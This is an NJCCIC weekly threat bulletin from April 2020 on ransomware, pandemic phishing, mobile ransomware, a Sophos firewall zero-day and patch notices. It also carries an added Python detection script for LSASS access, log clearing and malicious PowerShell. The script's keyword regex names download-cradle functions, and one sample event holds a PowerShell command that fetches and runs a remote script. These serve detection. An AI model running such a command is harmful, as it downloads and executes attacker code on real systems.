
Page 1: The Ransomware Threat is Evolving - cdn.buttercms.com

THE WEEKLY BULLETIN

April 30, 2020

TLP: WHITE

Garden State Cyber Threat Highlight

Providing our members with a weekly insight into the threats and malicious activity directly targeting New Jersey networks.

The Ransomware Threat is Evolving

Image Source: Microsoft

Over the last several months, the NJCCIC has reported that multiple ransomware threat actors have threatened to expose data stolen from ransomware victims if payment is not made. This trend is continuing and, according to Microsoft, some ransomware threat actors are exfiltrating data even if they do not plan to use it as leverage for payment. Additionally, Microsoft’s Threat Protection Intelligence Team found that threat actors are compromising networks for several months before deploying ransomware, extending their reach within the network and waiting for the most opportune time in order to maximize their potential profits. Recent cases reported to the NJCCIC are consistent with Microsoft's findings regarding persistence and data exfiltration. Furthermore, Microsoft found that some threat actors maintain control over network systems in order to launch future attacks. Many ransomware attacks begin with the exploitation of vulnerable internet-facing network devices and devices with weak authentication requirements, such as Remote Desktop Protocol (RDP) servers. As the NJCCIC discussed last week, there are roughly 30,000 internet-facing endpoints in NJ with RDP enabled – all possible vectors to launch a ransomware attack. Despite this difficult time, healthcare and other critical services, as well as small and medium-sized businesses (SMBs), are still targeted by ransomware. In some cases, the victims have had to make the difficult decision to either pay the criminals or accept the data loss, significantly impacting their operations. The NJCCIC advises users and administrators to follow the recommendations provided by Microsoft and ensure all internet-facing systems, such as RDP servers and Virtual Desktop endpoints, require multi-factor authentication; search networks for malicious PowerShell, Mimikatz, and Cobalt Strike activity; search for suspicious access to Local Security Authority Subsystem Service (LSASS) and registry or security event log modifications; ensure all systems are patched, including Citrix ADC, Pulse Secure VPN, Microsoft SharePoint, Microsoft Exchange, and Zoho ManageEngine; and establish a comprehensive data backup plan that includes keeping multiple, tested backups off the network and in a separate and secure location. Microsoft provides additional details on recent ransomware attacks in their blog post. The NJCCIC provides ransomware risk mitigation strategies in our mitigation guide.
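The three hunting recommendations above (suspicious LSASS access, security event log tampering, malicious PowerShell) map onto a handful of well-known Windows and Sysmon event IDs. The script below is an added illustration, not part of the NJCCIC bulletin or Microsoft's guidance: it runs simple detection rules over a few constructed event records shaped like Sysmon Event ID 10 (ProcessAccess), Security Event ID 1102 (audit log cleared) and PowerShell Event ID 4104 (script block logging). The event IDs are real; the host names, paths, the LSASS allowlist and the sample events are assumptions made for the example and would need tuning in a real environment.

```python
"""Toy detection pass for the LSASS / event-log / PowerShell indicators named in
the bulletin. The SAMPLE_EVENTS below are CONSTRUCTED, not real telemetry."""
import re

# Real Windows / Sysmon event IDs used by the rules.
SYSMON_PROCESS_ACCESS = 10     # Sysmon: a process opened a handle to another process
SECURITY_LOG_CLEARED = 1102    # Security: "The audit log was cleared"
PS_SCRIPT_BLOCK = 4104         # Microsoft-Windows-PowerShell: script block logging

PROCESS_VM_READ = 0x0010       # access right needed to read another process's memory

# Assumption: system processes that routinely open lsass.exe on most hosts.
# Tune this per environment; an overly broad allowlist hides real activity.
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Strings typical of download cradles and encoded commands in hostile PowerShell.
SUSPICIOUS_PS = re.compile(
    r"(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
    r"|downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string)",
    re.IGNORECASE,
)


def check_lsass_access(event):
    """Flag a non-allowlisted process that opened lsass.exe with memory-read rights."""
    if event["channel"] != "Sysmon" or event["event_id"] != SYSMON_PROCESS_ACCESS:
        return None
    data = event["data"]
    if not data.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    if data.get("SourceImage", "").lower() in LSASS_ALLOWLIST:
        return None
    granted = int(data.get("GrantedAccess", "0x0"), 16)   # Sysmon logs a hex mask
    if granted & PROCESS_VM_READ:
        return ("lsass-memory-read", event["host"],
                f"{data['SourceImage']} opened lsass.exe with {data['GrantedAccess']}")
    return None


def check_log_cleared(event):
    """Event 1102 is always worth an alert: attackers clear logs to hide activity."""
    if event["channel"] == "Security" and event["event_id"] == SECURITY_LOG_CLEARED:
        who = event["data"].get("SubjectUserName", "?")
        return ("security-log-cleared", event["host"], f"audit log cleared by {who}")
    return None


def check_powershell(event):
    """Match logged script blocks against the download-cradle / encoding patterns."""
    if event["channel"] != "PowerShell" or event["event_id"] != PS_SCRIPT_BLOCK:
        return None
    text = event["data"].get("ScriptBlockText", "")
    match = SUSPICIOUS_PS.search(text)
    if match:
        return ("suspicious-powershell", event["host"],
                f"matched '{match.group(0)}' in: {text[:80]}")
    return None


RULES = (check_lsass_access, check_log_cleared, check_powershell)


def analyze(events):
    """Run every rule over every event; return (rule, host, detail) alerts in order."""
    alerts = []
    for event in events:
        for rule in RULES:
            hit = rule(event)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events (hosts, users and paths are invented for the example).
SAMPLE_EVENTS = [
    {"channel": "Sysmon", "event_id": 10, "host": "WS01", "data": {
        "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\mk.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"}},
    {"channel": "Sysmon", "event_id": 10, "host": "WS01", "data": {
        "SourceImage": r"C:\Windows\System32\svchost.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"}},
    {"channel": "Security", "event_id": 1102, "host": "SRV02",
     "data": {"SubjectUserName": "jdoe"}},
    {"channel": "PowerShell", "event_id": 4104, "host": "WS01", "data": {
        "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"}},
    {"channel": "PowerShell", "event_id": 4104, "host": "SRV02", "data": {
        "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"}},
]

if __name__ == "__main__":
    for rule_name, host, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule_name}] {host}: {detail}")
```

Run as-is the script raises three alerts (the Temp-directory binary reading LSASS memory, the cleared Security log, and the download cradle) and stays quiet on the allowlisted svchost.exe handle and the benign Get-Service pipeline. The two things to note for production use are that Sysmon ProcessAccess and PowerShell script block logging both have to be enabled before these events exist at all, and that the allowlist and regex are starting points, not a finished ruleset.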

Announcement

Telework Guidance

The Cybersecurity and Infrastructure Security Agency (CISA) has provided a compilation of telework guidance and resources from industry partners in an effort to assist organizations and teleworkers in securing their remote working environment. Further information can be found here. Additionally, the National Security Agency (NSA) has provided guidance for telework collaboration services here.

Threat Alerts

US Federal Reserve Economic Relief Phishing Campaign

The NJCCIC’s email security solution has identified and blocked multiple COVID-19 phishing campaigns consistent with open-source reporting, including those recently impersonating the US Federal Reserve with economic relief options through the Payment Protection Program in order to steal banking credentials. Phishing emails from the “Federal Reserve System” contain the subject line “Receive payment.” and include a link that, if clicked, directs the victim to a spoofed website with legitimate logos, stock photos, and an FAQ section. Clicking on the “Get Economic Impact Payment Now” button displays a drop-down menu of banks to choose from. A login box, containing the selected bank and its logo, then prompts the victim to enter their banking credentials. If entered, an error message is displayed while the credentials are sent to the threat actors in the background. The NJCCIC recommends users and organizations educate themselves and others on these continuing threats and tactics to reduce victimization. Users are advised to avoid clicking links, opening attachments, or providing personal or financial information in response to emails from unknown senders and to exercise caution with emails from known senders. If you are unsure of an email’s legitimacy, contact the sender via a separate means of communication. We also advise users not to take action on emails promising economic relief and, instead, to obtain information from official sources.

Black Rose Lucy Ransomware Attempts to Extort Victims by Impersonating the FBI

Image Source: Check Point Research

Cyber-criminals have repurposed an Android botnet and dropper Malware-as-a-Service (MaaS) to deliver the ransomware variant known as Black Rose Lucy. Check Point researchers first identified the MaaS, believed to be developed by the Russian-speaking Lucy Gang, in September 2018. The ransomware masquerades as a video application and is commonly delivered via social media links and instant messenger applications. In order to bypass Android security, a message is displayed requesting the user to enable “Streaming Video Optimization” (SVO). If clicked, the cyber-criminal is granted access to the accessibility service and encryption is initiated on the device. A ransom note appears in the web browser window claiming that the encryption was carried out by the Federal Bureau of Investigation (FBI) due to pornographic content found on the device. Furthermore, the victim is instructed to pay a $500 fine by providing their credit card information. It is important to note that the FBI would not conduct operations in this manner, nor would they ask for credit card details. This use of mobile ransomware highlights an expansion in the attack landscape. The NJCCIC recommends users exercise caution when clicking on links within social media posts or instant messages. Additionally, we urge users to pay close attention to the permissions and functions that are enabled when using applications. Further information can be found in the Check Point Research article.

Threat Actors Capitalize on Unemployment Fears


Image Source: Help Net Security

As the current pandemic has caused occupational loss and furloughs, cyber-criminals are capitalizing on unemployment concerns. One campaign currently circulating is a phishing email crafted to appear as a Zoom meeting invitation that requests the recipient to join for the purpose of “contract suspension” or “termination trial.” Additionally, the email claims that the meeting will begin momentarily, enticing the user to click without further scrutiny. If the link is clicked, the user is directed to a spoofed Zoom login page requesting the user’s “email” credentials. Once the credentials are entered, the user is redirected to a Zoom help page, and the credentials are sent to the threat actor. Another phishing campaign claims to be from an outsourced human resources contractor and requests recipients to view a fictitious payroll report that includes additional stimulus. The link is hosted on Google Docs and contains another link that, if clicked, downloads unknown malware. A third scam that has surfaced involves employment ads offering teleworking opportunities. After the victim obtains an interview and is given an offer of employment, they are prompted to complete various forms, such as a W-9 and a direct deposit authorization. The scammer is then provided with all the details required to drain bank accounts and steal the victim’s identity. The NJCCIC reminds users to exercise caution when opening unsolicited emails and to confirm details via an alternate means of communication. Additionally, jobseekers are urged to research potential employers and businesses prior to providing sensitive information. Furthermore, we urge users to educate others about these and similar scams to avoid victimization.

Zero-day Affecting Sophos XG Firewall Actively Exploited


Image Source: Sophos Community

A zero-day Structured Query Language (SQL) injection vulnerability affecting Sophos’ XG Firewall was discovered on April 22, 2020 and is actively being exploited. Threat actors are deploying trojan malware, dubbed Asnarök by Sophos researchers, in an attempt to harvest XG Firewall-resident data such as usernames and hashed passwords for local device administrators (admin), user portal accounts, and accounts used for remote access. Successful exploitation may lead to remote code execution on both physical and virtual unpatched firewalls. Sophos has deployed a hotfix to devices that receive automatic updates, which includes a message on the management interface indicating if the device was affected. In addition to the hotfix, Sophos recommends resetting device admin accounts and changing local user account passwords – including accounts that may have re-used these credentials – in order to repair compromised devices. The NJCCIC urges Sophos XG Firewall admins who may not have enabled automatic updates to apply the hotfix immediately. Additionally, we recommend disabling HTTPS admin services and unused user portals on the WAN interface. For further guidance and technical details, please review the Sophos security advisory.

Threat Actors Target Trucking Companies

The logistics industry, including trucking companies, has played a critical role during the COVID-19 pandemic despite supply shortages. Threat actors are taking advantage of this crisis through vishing attempts offering fraudulent CARES Act loan forgiveness to small businesses, impersonation scams of legitimate logistics companies offering fake work-from-home positions to repackage and reship items, and the targeting of systems and networks. These scams present opportunities for fraud, identity theft, and future cyber-attacks, as victims may inadvertently disclose sensitive information. The NJCCIC recommends users use strong passwords for all accounts, enable multi-factor authentication where available, keep all software and hardware updated, exercise caution with unexpected or suspicious emails and other communications, and refrain from sharing personal or financial information without verifying the requestor. Organizations are encouraged to adopt a defense-in-depth cybersecurity strategy, apply the principle of least privilege, and establish a comprehensive data backup plan. More information can be found in the Security Boulevard article.

Vulnerability Advisory

Project Zero Discovers Zero-Click Flaws in Apple Operating Systems

Researchers from Google’s Project Zero discovered six flaws in Apple’s multimedia processing component Image I/O, a framework responsible for parsing and working with image files. Image I/O ships with iOS, macOS, tvOS, and watchOS, and most apps running on these operating systems (OSs) rely on it for processing image metadata. Multimedia processing components, including Image I/O, are desirable attack surfaces because they do not require user interaction to run code on the targeted system, sometimes referred to as “zero-click” attacks. In addition to the Image I/O flaws, the researchers discovered eight bugs in OpenEXR, an open-source library for parsing EXR image files that ships as a component of Image I/O. All of the discovered vulnerabilities have been patched. The researchers stressed that more research needs to be conducted into multimedia processing components. The NJCCIC recommends users running Apple OSs ensure systems are updated to the latest vendor-supported patch levels. More information can be found in the Project Zero blog post.

Breach Notification


Nintendo

Nintendo is restricting logins and resetting passwords for up to 160,000 Nintendo Network ID (NNID) accounts that may have been accessed by unauthorized third parties. Potentially exposed information may have included name, date of birth, gender, country/region, and email address. Users are advised to establish strong passwords and refrain from reusing the same password across multiple accounts.

Threat Profiles

Android | ATM Malware | Botnet | Cryptocurrency-Mining | Exploit Kit

Industrial Control Systems | iOS | macOS | Point-of-Sale | Ransomware | Trojan

ICS-CERT Advisories

LCDS LAquis SCADA

Patches

Adobe (Bridge, Illustrator, Magento)

Chrome | Cisco | Juniper

Samba | VMware

WordPress (1, 2)

Throwback Thursday

COVID-19 Cybersecurity Resources

Social Engineering Awareness

The Human Brain is Both a Liability and Asset for Cybersecurity: Here’s Why

Comment: Curious users may find themselves easily drawn to requests, offers, or topics of interest and suddenly become the victim of specially-crafted phishing emails or business email compromise (BEC) scams. Cyber-criminals use evolving social engineering tactics in order for their target to take the bait and quickly practice the bad habit of clicking before thinking. However, users can arm themselves against the “reel” deal and develop healthy cybersecurity habits through frequent security awareness training and repetitive phishing simulations.

Cyber at a Glance

Aimed at Moving Targets: Five Cyber Threats That Put Mobile Devices at Risk

Comment: Many people use mobile devices to connect and communicate with others, and may do so with a false sense of security. Cyber-criminals can target users and vulnerable devices to gain access to sensitive information, install malware, and infiltrate networks and other systems. The security risks of data leakage and cyber-attacks can be reduced by installing reputable apps, checking security and privacy settings, keeping mobile devices updated, and exercising caution with suspicious communications, websites, and apps.

The information contained in this product is marked Traffic Light Protocol (TLP): WHITE. Disclosure is not limited. Subject to standard copyright rules, TLP: WHITE information may be distributed without restriction.

TLP: WHITE

Questions?

Email a Cyber Liaison Officer at [email protected].

The Weekly Bulletin aggregates information about cyber threats, vulnerabilities, and other resources to promote shared awareness and the adoption of best practices. Designed for a general audience, the Bulletin aims to bridge the information sharing gaps between all levels of government, the private sector, and our citizens.
